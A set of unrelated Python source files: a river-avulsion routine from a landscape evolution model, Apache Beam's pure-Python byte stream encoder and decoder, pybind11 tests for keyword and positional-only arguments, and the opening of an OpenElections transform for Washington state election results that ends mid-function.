        Diffusion coefficient and timestep used for splay deposition.
    dx, dy : float, optional
        Grid spacing of columns and rows.

    Returns
    -------
    tuple
        (new course (i, j), avulsion_type, avulsion location index,
        length of the abandoned reach, old-minus-new path-length
        difference, updated splay_depth)
    """
    new = riv_i, riv_j
    old = riv_i, riv_j
    avulsion_type = 0
    loc = 0
    avulse_length = 0
    new_length = 0
    # FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin int is the equivalent dtype.  (Also dropped the unused
    # locals `a = 0` and `new_course_length = 0`.)
    avul_locs = np.zeros(0, dtype=int)
    path_slopes = np.zeros(0)
    crevasse_locs = np.zeros(3, dtype=int)
    path_diff = np.zeros(0)
    path_difference = 0
    old_length = find_riv_path_length(n, old, current_SL, ch_depth,
                                      slope, dx=dx, dy=dy)
    for a in range(1, len(riv_i)-1):
        if channel_is_superelevated(n, (riv_i[a], riv_j[a]),
                                    (riv_i[a-1], riv_j[a-1]),
                                    ch_depth, super_ratio, current_SL):
            # if superelevation greater than trigger ratio, determine
            # new steepest descent path
            new = steep_desc.find_course(n, riv_i, riv_j, a, ch_depth,
                                         sea_level=current_SL)
            # use the subaqueous length metric when the new course ends
            # below sea level, the subaerial one otherwise
            if n[new[0][-1], new[1][-1]] < current_SL:
                new_length = find_riv_path_length(n, new, current_SL, ch_depth,
                                                  slope, dx=dx, dy=dy)
            else:
                new_length = find_path_length(n, new, current_SL, ch_depth,
                                              slope, dx=dx, dy=dy)
            if new_length < old_length:
                # calculate slope of new path
                if len(new[0][a:]) <= 1:
                    # degenerate one-point tail: measure from one node back
                    avulsed_length = find_path_length(n, (new[0][a-1:], new[1][a-1:]),
                                                      current_SL, ch_depth, slope,
                                                      dx=dx, dy=dy)
                    slope_new_path = ((n[new[0][-2], new[1][-2]] - n[new[0][-1], new[1][-1]])
                                      / avulsed_length)
                elif n[new[0][-1], new[1][-1]] < current_SL:
                    avulsed_length = find_riv_path_length(n, (new[0][a:], new[1][a:]),
                                                          current_SL, ch_depth,
                                                          slope, dx=dx, dy=dy)
                    slope_new_path = ((n[new[0][a], new[1][a]] - n[new[0][-1], new[1][-1]])
                                      / avulsed_length)
                else:
                    avulsed_length = find_path_length(n, (new[0][a:], new[1][a:]),
                                                      current_SL, ch_depth, slope,
                                                      dx=dx, dy=dy)
                    slope_new_path = ((n[new[0][a], new[1][a]] - n[new[0][-1], new[1][-1]])
                                      / avulsed_length)
                avul_locs = np.append(avul_locs, a)
                path_slopes = np.append(path_slopes, slope_new_path)
                path_diff = np.append(path_diff, (old_length - new_length))
                crevasse_locs = np.vstack((crevasse_locs, [new[0][a], new[1][a], a]))
    if (crevasse_locs.sum() > 0):
        # drop the all-zeros initializer row
        crevasse_locs = np.delete(crevasse_locs, 0, 0)
    if avul_locs.size > 0:
        # avulse at the candidate with the steepest new-path slope
        max_slope = np.argmax(path_slopes)
        loc = avul_locs[max_slope]
        path_difference = path_diff[max_slope]
        new = steep_desc.find_course(n, riv_i, riv_j, loc, ch_depth,
                                     sea_level=current_SL)
        avulsion_type = 1
        new, avulsion_type = avulse_to_new_path(n,
                                                (riv_i[loc - 1:], riv_j[loc - 1:]),
                                                (new[0][loc - 1:], new[1][loc - 1:]),
                                                current_SL, ch_depth, avulsion_type,
                                                slope, dx=dx, dy=dy)
        new = (np.append(riv_i[:loc - 1], new[0]),
               np.append(riv_j[:loc - 1], new[1]))
        avulse_length = find_riv_path_length(n, (riv_i[loc:], riv_j[loc:]),
                                             current_SL, ch_depth,
                                             slope, dx=dx, dy=dy)
        # fill up old channel... could be some fraction in the future
        # (determines whether channels are repellors or attractors)
        fill_abandoned_channel(loc, n, new, riv_i, riv_j, current_SL,
                               ch_depth, slope, dx)
        # the avulsed location no longer gets a splay
        crevasse_locs = np.delete(crevasse_locs, max_slope, 0)
    else:
        new = riv_i, riv_j
    if (crevasse_locs.sum() > 0) and (splay_type > 0):
        n_before_splay = np.copy(n)
        # Don' think we need to worry about preserving old river elevations??
        # old_river_elevations = n[riv_i, riv_j]
        new_river_elevations = n[new[0], new[1]]
        for i in range(crevasse_locs.shape[0]):
            splay_dep = calc_crevasse_dep(dx, dy, nu, dt, ch_depth, riv_i, riv_j, n,
                                          current_SL, slope, crevasse_locs[i][2])
            if splay_dep > 0:
                FP.dep_splay(n, (crevasse_locs[i][0], crevasse_locs[i][1]),
                             splay_dep, splay_type=splay_type)
        # restore the channel elevations that splay deposition may have buried
        # n[riv_i, riv_j] = old_river_elevations
        n[new[0], new[1]] = new_river_elevations
        n_splay = n - n_before_splay
        splay_depth += n_splay
    return (new, avulsion_type, loc, avulse_length, path_difference, splay_depth)
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A pure Python implementation of stream.pyx.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import struct
import sys
from builtins import chr
from builtins import object
from typing import List
class OutputStream(object):
  """For internal use only; no backwards-compatibility guarantees.

  A pure Python implementation of stream.OutputStream: an append-only
  byte sink that buffers chunks in a list and tracks the total length."""
  def __init__(self):
    self.data = []  # type: List[bytes]
    self.byte_count = 0

  def write(self, b, nested=False):
    # type: (bytes, bool) -> None
    """Append *b*; when *nested*, prefix it with its varint-encoded length."""
    assert isinstance(b, bytes)
    if nested:
      self.write_var_int64(len(b))
    self.data.append(b)
    self.byte_count += len(b)

  def write_byte(self, val):
    """Append a single byte given as an int in [0, 255]."""
    self.data.append(chr(val).encode('latin-1'))
    self.byte_count += 1

  def write_var_int64(self, v):
    # type: (int) -> None
    """Write *v* as a base-128 varint (negatives as unsigned 64-bit)."""
    if v < 0:
      v += 1 << 64
      if v <= 0:
        raise ValueError('Value too large (negative).')
    while True:
      septet = v & 0x7F
      v >>= 7
      # set the continuation bit on every byte but the last
      self.write_byte(septet | 0x80 if v else septet)
      if not v:
        break

  def write_bigendian_int64(self, v):
    self.write(struct.pack('>q', v))

  def write_bigendian_uint64(self, v):
    self.write(struct.pack('>Q', v))

  def write_bigendian_int32(self, v):
    self.write(struct.pack('>i', v))

  def write_bigendian_double(self, v):
    self.write(struct.pack('>d', v))

  def get(self):
    # type: () -> bytes
    """Return everything written so far as a single bytes object."""
    return b''.join(self.data)

  def size(self):
    # type: () -> int
    return self.byte_count

  def _clear(self):
    # type: () -> None
    self.data = []
    self.byte_count = 0
class ByteCountingOutputStream(OutputStream):
  """For internal use only; no backwards-compatibility guarantees.

  A pure Python implementation of stream.ByteCountingOutputStream: a sink
  that discards the bytes written to it and records only how many there
  were (varint length prefixes for nested writes included)."""
  def __init__(self):
    # The base-class buffer is initialized but intentionally never used;
    # only the running count matters here.
    super(ByteCountingOutputStream, self).__init__()
    self.count = 0

  def write(self, byte_array, nested=False):
    # type: (bytes, bool) -> None
    if nested:
      self.write_var_int64(len(byte_array))
    self.count += len(byte_array)

  def write_byte(self, _):
    self.count += 1

  def get_count(self):
    return self.count

  def get(self):
    # No data is retained, so there is nothing to return.
    raise NotImplementedError

  def __str__(self):
    return '<%s %s>' % (self.__class__.__name__, self.count)
class InputStream(object):
  """For internal use only; no backwards-compatibility guarantees.

  A pure Python implementation of stream.InputStream: a cursor over a
  bytes object with varint and big-endian decoding helpers."""
  def __init__(self, data):
    # type: (bytes) -> None
    self.data = data
    self.pos = 0
    # Indexing a byte-string yields a 1-char str on Python 2 but an int on
    # Python 3, e.g. for b = b'\xff\x01':
    #   Python 2: b[0] == '\xff', ord(b[0]) == 255
    #   Python 3: b[0] == 255
    # so bind the matching byte reader once, up front.
    if sys.version_info[0] >= 3:
      self.read_byte = self.read_byte_py3
    else:
      self.read_byte = self.read_byte_py2

  def size(self):
    """Number of unread bytes remaining."""
    return len(self.data) - self.pos

  def read(self, size):
    # type: (int) -> bytes
    start = self.pos
    self.pos = start + size
    return self.data[start:self.pos]

  def read_all(self, nested):
    # type: (bool) -> bytes
    """Read a varint-length-prefixed chunk (*nested*) or the remainder."""
    if nested:
      return self.read(self.read_var_int64())
    return self.read(self.size())

  def read_byte_py2(self):
    # type: () -> int
    self.pos += 1
    # mypy tests against python 3.x, where this is an error:
    return ord(self.data[self.pos - 1])  # type: ignore[arg-type]

  def read_byte_py3(self):
    # type: () -> int
    self.pos += 1
    return self.data[self.pos - 1]

  def read_var_int64(self):
    """Decode a base-128 varint as a signed 64-bit integer."""
    shift = 0
    result = 0
    while True:
      raw = self.read_byte()
      if raw < 0:
        raise RuntimeError('VarLong not terminated.')
      low7 = raw & 0x7F
      if shift >= 64 or (shift >= 63 and low7 > 1):
        raise RuntimeError('VarLong too long.')
      result |= low7 << shift
      shift += 7
      if not raw & 0x80:
        break
    # reinterpret as two's-complement signed 64-bit
    if result >= 1 << 63:
      result -= 1 << 64
    return result

  def read_bigendian_int64(self):
    return struct.unpack('>q', self.read(8))[0]

  def read_bigendian_uint64(self):
    return struct.unpack('>Q', self.read(8))[0]

  def read_bigendian_int32(self):
    return struct.unpack('>i', self.read(4))[0]

  def read_bigendian_double(self):
    return struct.unpack('>d', self.read(8))[0]
def get_varint_size(v):
  """For internal use only; no backwards-compatibility guarantees.

  Returns the size of the given integer value when encoded as a VarInt."""
  if v < 0:
    # Negative values are encoded as their 64-bit two's-complement.
    v += 1 << 64
    if v <= 0:
      raise ValueError('Value too large (negative).')
  # Each var-int byte carries 7 payload bits; zero still occupies one byte.
  return max(1, -(-v.bit_length() // 7))
|
|
# -*- coding: utf-8 -*-
import pytest
import env # noqa: F401
from pybind11_tests import kwargs_and_defaults as m
def test_function_signatures(doc):
    """Generated docstrings render argument names, annotations, and defaults."""
    assert doc(m.kw_func0) == "kw_func0(arg0: int, arg1: int) -> str"
    assert doc(m.kw_func1) == "kw_func1(x: int, y: int) -> str"
    assert doc(m.kw_func2) == "kw_func2(x: int = 100, y: int = 200) -> str"
    assert doc(m.kw_func3) == "kw_func3(data: str = 'Hello world!') -> None"
    assert doc(m.kw_func4) == "kw_func4(myList: List[int] = [13, 17]) -> str"
    assert doc(m.kw_func_udl) == "kw_func_udl(x: int, y: int = 300) -> str"
    assert doc(m.kw_func_udl_z) == "kw_func_udl_z(x: int, y: int = 0) -> str"
    assert doc(m.args_function) == "args_function(*args) -> tuple"
    assert doc(m.args_kwargs_function) == "args_kwargs_function(*args, **kwargs) -> tuple"
    assert doc(m.KWClass.foo0) == \
        "foo0(self: m.kwargs_and_defaults.KWClass, arg0: int, arg1: float) -> None"
    assert doc(m.KWClass.foo1) == \
        "foo1(self: m.kwargs_and_defaults.KWClass, x: int, y: float) -> None"
def test_named_arguments(msg):
    """Named arguments can be passed positionally, by keyword, or defaulted."""
    assert m.kw_func0(5, 10) == "x=5, y=10"
    assert m.kw_func1(5, 10) == "x=5, y=10"
    assert m.kw_func1(5, y=10) == "x=5, y=10"
    assert m.kw_func1(y=10, x=5) == "x=5, y=10"
    assert m.kw_func2() == "x=100, y=200"
    assert m.kw_func2(5) == "x=5, y=200"
    assert m.kw_func2(x=5) == "x=5, y=200"
    assert m.kw_func2(y=10) == "x=100, y=10"
    assert m.kw_func2(5, 10) == "x=5, y=10"
    assert m.kw_func2(x=5, y=10) == "x=5, y=10"
    with pytest.raises(TypeError) as excinfo:
        # noinspection PyArgumentList
        m.kw_func2(x=5, y=10, z=12)
    # Keyword ordering in the error message is unspecified, hence the regex.
    assert excinfo.match(
        r'(?s)^kw_func2\(\): incompatible.*Invoked with: kwargs: ((x=5|y=10|z=12)(, |$))' + '{3}$')
    assert m.kw_func4() == "{13 17}"
    assert m.kw_func4(myList=[1, 2, 3]) == "{1 2 3}"
    assert m.kw_func_udl(x=5, y=10) == "x=5, y=10"
    assert m.kw_func_udl_z(x=5) == "x=5, y=0"
def test_arg_and_kwargs():
    """*args and **kwargs are forwarded to the bound function intact."""
    args = 'arg1_value', 'arg2_value', 3
    assert m.args_function(*args) == args
    args = 'a1', 'a2'
    kwargs = dict(arg3='a3', arg4=4)
    assert m.args_kwargs_function(*args, **kwargs) == (args, kwargs)
def test_mixed_args_and_kwargs(msg):
    """Regular arguments combine with *args/**kwargs; error text is exact."""
    mpa = m.mixed_plus_args
    mpk = m.mixed_plus_kwargs
    mpak = m.mixed_plus_args_kwargs
    mpakd = m.mixed_plus_args_kwargs_defaults
    assert mpa(1, 2.5, 4, 99.5, None) == (1, 2.5, (4, 99.5, None))
    assert mpa(1, 2.5) == (1, 2.5, ())
    with pytest.raises(TypeError) as excinfo:
        assert mpa(1)
    assert msg(excinfo.value) == """
        mixed_plus_args(): incompatible function arguments. The following argument types are supported:
            1. (arg0: int, arg1: float, *args) -> tuple
        Invoked with: 1
    """  # noqa: E501 line too long
    with pytest.raises(TypeError) as excinfo:
        assert mpa()
    assert msg(excinfo.value) == """
        mixed_plus_args(): incompatible function arguments. The following argument types are supported:
            1. (arg0: int, arg1: float, *args) -> tuple
        Invoked with:
    """  # noqa: E501 line too long
    assert mpk(-2, 3.5, pi=3.14159, e=2.71828) == (-2, 3.5, {'e': 2.71828, 'pi': 3.14159})
    assert mpak(7, 7.7, 7.77, 7.777, 7.7777, minusseven=-7) == (
        7, 7.7, (7.77, 7.777, 7.7777), {'minusseven': -7})
    assert mpakd() == (1, 3.14159, (), {})
    assert mpakd(3) == (3, 3.14159, (), {})
    assert mpakd(j=2.71828) == (1, 2.71828, (), {})
    assert mpakd(k=42) == (1, 3.14159, (), {'k': 42})
    assert mpakd(1, 1, 2, 3, 5, 8, then=13, followedby=21) == (
        1, 1, (2, 3, 5, 8), {'then': 13, 'followedby': 21})
    # Arguments specified both positionally and via kwargs should fail:
    with pytest.raises(TypeError) as excinfo:
        assert mpakd(1, i=1)
    assert msg(excinfo.value) == """
        mixed_plus_args_kwargs_defaults(): incompatible function arguments. The following argument types are supported:
            1. (i: int = 1, j: float = 3.14159, *args, **kwargs) -> tuple
        Invoked with: 1; kwargs: i=1
    """  # noqa: E501 line too long
    with pytest.raises(TypeError) as excinfo:
        assert mpakd(1, 2, j=1)
    assert msg(excinfo.value) == """
        mixed_plus_args_kwargs_defaults(): incompatible function arguments. The following argument types are supported:
            1. (i: int = 1, j: float = 3.14159, *args, **kwargs) -> tuple
        Invoked with: 1, 2; kwargs: j=1
    """  # noqa: E501 line too long
def test_keyword_only_args(msg):
    """py::kw_only() makes trailing arguments keyword-only."""
    assert m.kw_only_all(i=1, j=2) == (1, 2)
    assert m.kw_only_all(j=1, i=2) == (2, 1)
    with pytest.raises(TypeError) as excinfo:
        assert m.kw_only_all(i=1) == (1,)
    assert "incompatible function arguments" in str(excinfo.value)
    with pytest.raises(TypeError) as excinfo:
        assert m.kw_only_all(1, 2) == (1, 2)
    assert "incompatible function arguments" in str(excinfo.value)
    assert m.kw_only_some(1, k=3, j=2) == (1, 2, 3)
    assert m.kw_only_with_defaults(z=8) == (3, 4, 5, 8)
    assert m.kw_only_with_defaults(2, z=8) == (2, 4, 5, 8)
    assert m.kw_only_with_defaults(2, j=7, k=8, z=9) == (2, 7, 8, 9)
    assert m.kw_only_with_defaults(2, 7, z=9, k=8) == (2, 7, 8, 9)
    assert m.kw_only_mixed(1, j=2) == (1, 2)
    assert m.kw_only_mixed(j=2, i=3) == (3, 2)
    assert m.kw_only_mixed(i=2, j=3) == (2, 3)
    assert m.kw_only_plus_more(4, 5, k=6, extra=7) == (4, 5, 6, {'extra': 7})
    assert m.kw_only_plus_more(3, k=5, j=4, extra=6) == (3, 4, 5, {'extra': 6})
    assert m.kw_only_plus_more(2, k=3, extra=4) == (2, -1, 3, {'extra': 4})
    with pytest.raises(TypeError) as excinfo:
        assert m.kw_only_mixed(i=1) == (1,)
    assert "incompatible function arguments" in str(excinfo.value)
    # Registering an unnamed arg after kw_only is rejected at bind time.
    with pytest.raises(RuntimeError) as excinfo:
        m.register_invalid_kw_only(m)
    assert msg(excinfo.value) == """
        arg(): cannot specify an unnamed argument after an kw_only() annotation
    """
def test_positional_only_args(msg):
    """py::pos_only() prevents leading arguments from being passed by keyword."""
    assert m.pos_only_all(1, 2) == (1, 2)
    assert m.pos_only_all(2, 1) == (2, 1)
    with pytest.raises(TypeError) as excinfo:
        m.pos_only_all(i=1, j=2)
    assert "incompatible function arguments" in str(excinfo.value)
    assert m.pos_only_mix(1, 2) == (1, 2)
    assert m.pos_only_mix(2, j=1) == (2, 1)
    with pytest.raises(TypeError) as excinfo:
        m.pos_only_mix(i=1, j=2)
    assert "incompatible function arguments" in str(excinfo.value)
    assert m.pos_kw_only_mix(1, 2, k=3) == (1, 2, 3)
    assert m.pos_kw_only_mix(1, j=2, k=3) == (1, 2, 3)
    with pytest.raises(TypeError) as excinfo:
        m.pos_kw_only_mix(i=1, j=2, k=3)
    assert "incompatible function arguments" in str(excinfo.value)
    with pytest.raises(TypeError) as excinfo:
        m.pos_kw_only_mix(1, 2, 3)
    assert "incompatible function arguments" in str(excinfo.value)
    with pytest.raises(TypeError) as excinfo:
        m.pos_only_def_mix()
    assert "incompatible function arguments" in str(excinfo.value)
    assert m.pos_only_def_mix(1) == (1, 2, 3)
    assert m.pos_only_def_mix(1, 4) == (1, 4, 3)
    assert m.pos_only_def_mix(1, 4, 7) == (1, 4, 7)
    assert m.pos_only_def_mix(1, 4, k=7) == (1, 4, 7)
    with pytest.raises(TypeError) as excinfo:
        m.pos_only_def_mix(1, j=4)
    assert "incompatible function arguments" in str(excinfo.value)
def test_signatures():
    """Generated signatures use PEP 570 '/' and PEP 3102 '*' markers."""
    assert "kw_only_all(*, i: int, j: int) -> tuple\n" == m.kw_only_all.__doc__
    assert "kw_only_mixed(i: int, *, j: int) -> tuple\n" == m.kw_only_mixed.__doc__
    assert "pos_only_all(i: int, j: int, /) -> tuple\n" == m.pos_only_all.__doc__
    assert "pos_only_mix(i: int, /, j: int) -> tuple\n" == m.pos_only_mix.__doc__
    assert "pos_kw_only_mix(i: int, /, j: int, *, k: int) -> tuple\n" == m.pos_kw_only_mix.__doc__
@pytest.mark.xfail("env.PYPY and env.PY2", reason="PyPy2 doesn't double count")
def test_args_refcount():
    """Issue/PR #1216 - py::args elements get double-inc_ref()ed when combined with regular
    arguments"""
    refcount = m.arg_refcount_h
    myval = 54321
    expected = refcount(myval)
    assert m.arg_refcount_h(myval) == expected
    assert m.arg_refcount_o(myval) == expected + 1
    assert m.arg_refcount_h(myval) == expected
    assert refcount(myval) == expected
    assert m.mixed_plus_args(1, 2.0, "a", myval) == (1, 2.0, ("a", myval))
    assert refcount(myval) == expected
    assert m.mixed_plus_kwargs(3, 4.0, a=1, b=myval) == (3, 4.0, {"a": 1, "b": myval})
    assert refcount(myval) == expected
    assert m.args_function(-1, myval) == (-1, myval)
    assert refcount(myval) == expected
    assert m.mixed_plus_args_kwargs(5, 6.0, myval, a=myval) == (5, 6.0, (myval,), {"a": myval})
    assert refcount(myval) == expected
    assert m.args_kwargs_function(7, 8, myval, a=1, b=myval) == \
        ((7, 8, myval), {"a": 1, "b": myval})
    assert refcount(myval) == expected
    exp3 = refcount(myval, myval, myval)
    assert m.args_refcount(myval, myval, myval) == (exp3, exp3, exp3)
    assert refcount(myval) == expected
    # This function takes the first arg as a `py::object` and the rest as a `py::args`. Unlike the
    # previous case, when we have both positional and `py::args` we need to construct a new tuple
    # for the `py::args`; in the previous case, we could simply inc_ref and pass on Python's input
    # tuple without having to inc_ref the individual elements, but here we can't, hence the extra
    # refs.
    assert m.mixed_args_refcount(myval, myval, myval) == (exp3 + 3, exp3 + 3, exp3 + 3)
    assert m.class_default_argument() == "<class 'decimal.Decimal'>"
|
|
from datetime import datetime
import logging
import re
from nameparser import HumanName
from openelex.base.transform import Transform, registry
from openelex.models import Candidate, Contest, Office, Party, RawResult, Result
from openelex.lib.text import ocd_type_id
from openelex.lib.insertbuffer import BulkInsertBuffer
# Configure module-level logging for the Washington transforms.
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

# Fields shared by contests, candidates, and results alike.
meta_fields = ['source', 'election_id', 'state']
# RawResult attributes copied onto each Contest.
contest_fields = meta_fields + [
    'start_date',
    'end_date',
    'election_type',
    'primary_type',
    'result_type',
    'special',
]
# RawResult attributes copied onto each Candidate.
candidate_fields = meta_fields + [
    'full_name',
    'given_name',
    'family_name',
    'additional_name',
]
# RawResult attributes copied onto each Result.
result_fields = meta_fields + [
    'reporting_level',
    'jurisdiction',
    'votes',
    'total_votes',
    'vote_breakdowns',
]

# This transform module handles Washington state.
STATE = 'WA'
class BaseTransform(Transform):
    """
    Base class that encapsulates shared functionality for other Washington
    transforms.
    """

    # Map of raw party strings, exactly as they appear in the Washington
    # results data, to standardized party abbreviations.
    PARTY_MAP = {
        # Unaffiliated
        'Nonpartisan': 'UN',
        '(States No Party Preference)': 'UN',
        '(Prefers Non Partisan Party)': 'UN',
        '(Prefers Neither Party)': 'UN',
        '(Prefers Non-partisan Party)': 'UN',
        # Independent
        'Independent Candidates': 'I',
        '(Prefers Independent Party)': 'I',
        '(Prefers ReganIndependent Party)': 'I',
        '(Prefers Independent - No Party)': 'I',
        '(Prefers Independent Dem. Party)': 'I',
        '(Prefers Centrist Party)': 'I',
        '(Prefers Independent No Party)': 'I',
        '(Prefers Independent Dem Party)': 'I',
        '(Prefers Independent-Gop Party)': 'I',
        '(Prefers Prog Independent Party)': 'I',
        '(Prefers Indep Republican Party)': 'I',
        # Republican
        # NOTE(review): duplicate keys for '(Prefers Republican Party)' and
        # '(Prefers GOP Party)' were removed; both duplicates mapped to 'R',
        # so behavior is unchanged.
        'Republican': 'R',
        'Republican Party Nominees': 'R',
        '(Prefers Republican Party)': 'R',
        '(Prefers G.O.P. Party)': 'R',
        '(Prefers (G.O.P.) Party)': 'R',
        '(Prefers G O P Party)': 'R',
        '(Prefers R Party)': 'R',
        '(Prefers Cut Taxes G.O.P. Party)': 'R',
        '(Prefers Grand Old Party)': 'R',
        '(Prefers (R) Problemfixer Party)': 'R',
        '(Prefers GOP Party)': 'R',
        '(Prefers Conservative Party)': 'R',
        '(Prefers Gop Party)': 'R',
        '(Prefers (R) Hope&change Party)': 'R',
        # Democrat
        'Democrat': 'D',
        'Democratic Party Nominees': 'D',
        '(Prefers Democratic Party)': 'D',
        '(Prefers Progressive Dem. Party)': 'D',
        '(Prefers Progressive Party)': 'D',
        '(Prefers True Democratic Party)': 'D',
        '(Prefers Progressive Dem Party)': 'D',
        '(Prefers Demo Party)': 'D',
        '(Prefers Prolife Democrat Party)': 'D',
        '(Prefers F.D.R. Democrat Party)': 'D',
        '(Prefers Democracy Indep. Party)': 'D',
        '(Prefers Democratic-Repub Party)': 'D',
        # Tea Party
        '(Prefers Tea Party)': 'TEA',
        # Libertarian
        '(Prefers Libertarian Party)': 'LIB',
        'Libertarian Party Nominees': 'LIB',
        # Green
        '(Prefers Green Party)': 'GRE',
        'Green Party Nominees': 'GRE',
        # Constitution
        '(Prefers Constitution Party)': 'CON',  # What's abbr for this?
        'Constitution Party Nominees': 'CON',
        # Party of Commons
        '(Prefers Party Of Commons Party)': 'COM',  # What's abbr for this?
        # Socialist
        # Not sure which this is
        'Socialism & Libertarian Party Nominees': 'SOC',
        'Socialist Workers Party Nominees': 'SOC',
        '(Prefers Socialist Altern Party)': 'SOC',
        # Etc
        # NOTE(review): missing closing paren below -- this only matches the
        # raw data if the source string is also unbalanced; verify upstream.
        '(Prefers Reform Party': 'REF',
        '(Prefers America\'s Third Party)': 'UK',
        '(Prefers Salmon Yoga Party)': 'UK',
        '(Prefers Lower Taxes Party)': 'UK',
        '(Prefers Bull Moose Party)': 'UK',
        '(Prefers Happiness Party)': 'UK',
        '(Prefers SeniorSide Party)': 'UK',
        'Justice Party Nominees': 'UK',
        '(Prefers The 99%% Party)': 'UK',
        '(Prefers Employmentwealth Party)': 'UK',
        '(Prefers The Human Rights Party)': 'UK',
        '(Prefers Neopopulist Party)': 'UK'
    }

    # Offices that are subdivided into districts; their lookup queries
    # must include the district field.
    district_offices = set([
        'U.S. Senate',
        'U.S. House of Representatives',
        'State Senate',
        'State House of Representatives',
    ])

    def __init__(self):
        super(BaseTransform, self).__init__()
        # Per-instance caches to avoid repeated datastore lookups.
        self._office_cache = {}
        self._party_cache = {}
        self._contest_cache = {}

    def get_raw_results(self):
        """Return an uncached queryset of all Washington raw results."""
        return RawResult.objects.filter(state=STATE).no_cache()

    def get_contest_fields(self, raw_result):
        """Build the field dict used to look up or create a Contest."""
        fields = self._get_fields(raw_result, contest_fields)
        fields['office'] = self._get_office(raw_result)
        return fields

    def _get_fields(self, raw_result, field_names):
        """Extract the named attributes from a RawResult as a dict."""
        return {k: getattr(raw_result, k) for k in field_names}

    def _get_office(self, raw_result):
        """Resolve and cache the Office instance for a raw result.

        Raises Office.DoesNotExist (after logging) when no office matches.
        """
        office_query = {
            'state': STATE,
            'name': self._clean_office(raw_result.office),
        }
        # Presidential contests are tracked nationally, not per-state.
        # BUGFIX: this previously used ``is 'President'``; identity
        # comparison against a string literal is implementation-dependent
        # and should be an equality test.
        if office_query['name'] == 'President':
            office_query['state'] = 'US'
        if office_query['name'] in self.district_offices:
            office_query['district'] = raw_result.district or ''
        key = Office.make_key(**office_query)
        try:
            return self._office_cache[key]
        except KeyError:
            try:
                office = Office.objects.get(**office_query)
                assert key == office.key
                self._office_cache[key] = office
                return office
            except Office.DoesNotExist:
                logger.error("\tNo office matching query {}".format(office_query))
                raise

    def get_party(self, raw_result, attr='party'):
        """Resolve and cache the Party for ``raw_result.<attr>``.

        Returns None when the raw value is empty or unrecognized; raises
        Party.DoesNotExist (after logging) when the abbreviation is known
        but missing from the datastore.
        """
        party = getattr(raw_result, attr)
        if not party:
            return None
        clean_abbrev = self._clean_party(party)
        if not clean_abbrev:
            return None
        try:
            return self._party_cache[clean_abbrev]
        except KeyError:
            try:
                party = Party.objects.get(abbrev=clean_abbrev)
                self._party_cache[clean_abbrev] = party
                return party
            except Party.DoesNotExist:
                logger.error("No party with abbreviation {}".format(clean_abbrev))
                raise

    def _clean_party(self, party):
        """Map a raw party string to its abbreviation, or None if unknown."""
        try:
            return self.PARTY_MAP[party]
        except KeyError:
            return None

    def _clean_office(self, office):
        """Normalize a raw office name to a canonical office string.

        Returns None when the office cannot be classified.

        See: https://github.com/openelections/core/blob/dev/openelex/us/wa/load.py#L370
        """
        presidential_regex = re.compile('president', re.IGNORECASE)
        senate_regex = re.compile('(senate|senator)', re.IGNORECASE)
        house_regex = re.compile('(house|representative)', re.IGNORECASE)
        governor_regex = re.compile('governor', re.IGNORECASE)
        treasurer_regex = re.compile('treasurer', re.IGNORECASE)
        auditor_regex = re.compile('auditor', re.IGNORECASE)
        sos_regex = re.compile('secretary', re.IGNORECASE)
        lt_gov_regex = re.compile(r'(lt|Lt|Lieutenant)', re.IGNORECASE)
        ospi_regex = re.compile(
            'superintendent of public instruction',
            re.IGNORECASE)
        ag_regex = re.compile('attorney general', re.IGNORECASE)
        wcpl_regex = re.compile('commissioner of public lands', re.IGNORECASE)
        # Distinguish state-level from national-level chambers.
        local_regex = re.compile(
            r'(\bState\b|Washington|Washington\s+State|Local|'
            'Legislative District)',
            re.IGNORECASE)
        national_regex = re.compile(
            r'(U\.S\.|\bUS\b|Congressional|National|United\s+States|U\.\s+S\.\s+)',
            re.IGNORECASE)
        if re.search(house_regex, office):
            if re.search(national_regex, office):
                return 'U.S. House of Representatives'
            elif re.search(local_regex, office):
                return 'State House of Representatives'
            else:
                return None
        elif re.search(governor_regex, office):
            return 'Governor'
        elif re.search(wcpl_regex, office):
            return 'Commissioner of Public Lands'
        elif re.search(senate_regex, office):
            if re.search(national_regex, office):
                return 'U.S. Senate'
            elif re.search(local_regex, office):
                return 'State Senate'
            else:
                return None
        elif re.search(lt_gov_regex, office):
            # NOTE: must be checked before 'Governor' would also match;
            # branch order is significant here.
            return 'Lieutenant Governor'
        elif re.search(ospi_regex, office):
            return 'Superintendent of Public Instruction'
        elif re.search(sos_regex, office):
            return 'Secretary of State'
        elif re.search(treasurer_regex, office):
            return 'Treasurer'
        elif re.search(auditor_regex, office):
            return 'Auditor'
        elif re.search(ag_regex, office):
            return 'Attorney General'
        elif re.search(presidential_regex, office):
            return 'President'
        else:
            return None

    def get_candidate_fields(self, raw_result):
        """Build the field dict used to look up or create a Candidate."""
        fields = self._get_fields(raw_result, candidate_fields)
        try:
            name = HumanName(raw_result.full_name)
        except TypeError:
            # full_name may be missing; fall back to the split name fields.
            name = HumanName("{} {}".format(raw_result.given_name, raw_result.family_name))
        fields['given_name'] = name.first
        fields['family_name'] = name.last
        if not fields['full_name']:
            fields['full_name'] = "{} {}".format(name.first, name.last)
        try:
            fields['additional_name'] = name.middle
            fields['suffix'] = name.suffix
        # BUGFIX: ``except Exception, e`` is Python-2-only syntax; the
        # ``as`` form works on Python 2.6+ and Python 3.
        except Exception as e:
            logger.error(e)
        return fields

    def get_contest(self, raw_result):
        """
        Returns the Contest model instance for a given RawResult.

        Caches the result in memory to reduce the number of calls to the
        datastore.
        """
        key = "%s-%s" % (raw_result.election_id, raw_result.contest_slug)
        try:
            return self._contest_cache[key]
        except KeyError:
            fields = self.get_contest_fields(raw_result)
            # 'source' varies between raw results belonging to the same
            # contest, so it can't be part of the lookup.
            fields.pop('source')
            try:
                try:
                    contest = Contest.objects.filter(**fields)[0]
                except IndexError:
                    # No match via filter(); let get() raise DoesNotExist.
